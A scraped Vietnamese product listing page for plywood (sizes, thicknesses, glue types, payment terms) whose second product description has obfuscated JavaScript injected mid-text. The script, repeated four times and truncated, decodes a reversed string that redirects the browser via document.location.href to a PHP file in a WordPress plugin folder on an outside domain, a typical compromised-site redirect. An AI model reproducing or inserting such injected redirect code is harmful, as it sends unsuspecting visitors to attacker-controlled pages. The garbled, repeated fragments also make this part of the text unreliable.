Category: Sản phẩm

hang-tra-dan

08

Th122018

Hàng trà dán

0  
Thông số 1: Kích cỡ: 1220x2440mm 2.Độ dày: 6mm/ 8mm/11mm/17mm 3.glue: Mr E1 E2 melamine WBP phenolic 4.Lõi: Acacia 5.Mặt/Lưng: Okume / bintangor 6.Độ rung sai: Minus or plus 0.2mm-0.3mm 7.Độ ẩm:8%-16% 8 Chất lượng: AB, BB 9.Số lượng: 8 pallets/20ft 16 pallets/40ft 18 pallets/40ft 10.Kỳ hạn thanh toán:T/T OR L/C AT SIGHT 11.Số lượng tối thiểu đặt hàng: 1*40hq 12 .Thời ... Read More
Tháng Mười Hai 8, 2018admin
Packing_Plywood7-1

08

Th122018

Hàng bao bì

0  
Thông số 1: Kích cỡ: 1220x2440mm, 910*1820mm ... 2.Độ dày: 2.5mm/4,6mm/8mm /11 mm /17mm/18m/22mm/25mm/28mm 3.Keo dán: Glue MR mixed water 4.Lõi: Accacia $Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var ... Read More
Tháng Mười Hai 8, 2018admin